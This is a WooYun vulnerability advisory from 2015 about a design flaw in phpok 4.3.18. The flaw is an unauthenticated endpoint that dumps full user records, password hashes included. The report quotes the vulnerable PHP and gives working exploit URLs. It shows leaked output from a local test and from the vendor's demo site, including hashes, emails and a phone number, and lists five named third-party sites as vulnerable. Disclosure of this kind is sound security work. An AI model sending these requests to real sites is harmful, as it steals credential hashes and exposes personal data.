当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127843

漏洞标题:phpok4.3.18 存高危设计缺陷(demo测试)。

相关厂商:phpok.com

漏洞作者: ′雨。

提交时间:2015-07-20 14:53

修复时间:2015-10-18 15:36

公开时间:2015-10-18 15:36

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-20: 细节已通知厂商并且等待厂商处理中
2015-07-20: 厂商已经确认,细节仅向厂商公开
2015-07-23: 细节向第三方安全合作伙伴开放
2015-09-13: 细节向核心白帽子及相关领域专家公开
2015-09-23: 细节向普通白帽子公开
2015-10-03: 细节向实习白帽子公开
2015-10-18: 细节向公众公开

简要描述:

RT

详细说明:

可直接拿管理员密码。
在framework/inp_control.php 中

function index_f()
	{
	 
		$type = $this->get("type");
	
		$content = $this->get("content");
		if($type == "title" && $content)
		{
			$this->get_title_list($content);
		}
		elseif($type == "user" && $content)
		{
			$this->get_user_list($content);//跟这里
		}
		json_exit("ok");
	}


function get_user_list($content)
	{
		$content = explode(",",$content);//成数组
		$list = array();
		foreach($content AS $key=>$value)
		{
			$value = intval($value);//被转整 没办法注入了。
			if($value) $list[] = $value;
		}
		$list = array_unique($list);
		$content = implode(",",$list);
		if(!$content) json_exit("ok");
		$condition = "u.id IN(".$content.")";//把转整后的带入
		$rslist = $this->model("user")->get_list($condition,0,999);
		if($rslist)
		{
			json_exit($rslist,true);
		}
		json_exit("ok");
	}


虽然没办法注入 但是我们继续看

if($rslist)//查询出来的数组
		{
			json_exit($rslist,true);//数出来
		}
		json_exit("ok");


把全部就输出来了。。 可啪。。
包括密码 全部的。
本地测试一下
访问 http://web/new/phpok/index.php?id=inp&type=user&content=3
输出 {"status":"ok","content":{"":{"id":null,"group_id":"2","user":"admin","pass":"ea6db1173951383825637cb4eea24bcd:38","status":"1","regtime":"1389672572","email":"[email protected]","mobile":"158185xxxxx","code":"","avatar":"res\/201402\/08\/488e6e17b9fb7f75.jpg","fullname":"","gender":"","content":false}}}
demo测试一下
http://demo.phpok.com/index.php?id=inp&type=user&content=17
http://demo.phpok.com/index.php?id=inp&type=user&content=14
http://demo.phpok.com/index.php?id=inp&type=user&content=15
{"status":"ok","content":{"15":{"id":"15","group_id":"2","user":"ehu114","pass":"0ba5a37e002bcb9f4469e5deb3ec317f:15","status":"0","regtime":"1424368658","email":"[email protected]","mobile":"18961833060","code":"","avatar":"","fullname":"","gender":"","content":""}}}
都输出了密码 之类的
官网上的成功案例。
http://www.easyexe.cn/index.php?id=inp&type=user&content=2
http://www.artpower.com.cn/index.php?id=inp&type=user&content=2
http://angeljuicer.cn/index.php?id=inp&type=user&content=3
http://www.sz-drh.com//index.php?id=inp&type=user&content=3
http://www.udeesoft.com//index.php?id=inp&type=user&content=3

漏洞证明:

见上。

修复方案:

敏感信息别输出。

版权声明:转载请注明来源 ′雨。@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-07-20 15:35

厂商回复:

好吧,我才发现这个文件我几乎没有用到,都不记得当时写个接口是做啥子用的,没想到你还能利用起来!囧啊~~~

最新状态:

暂无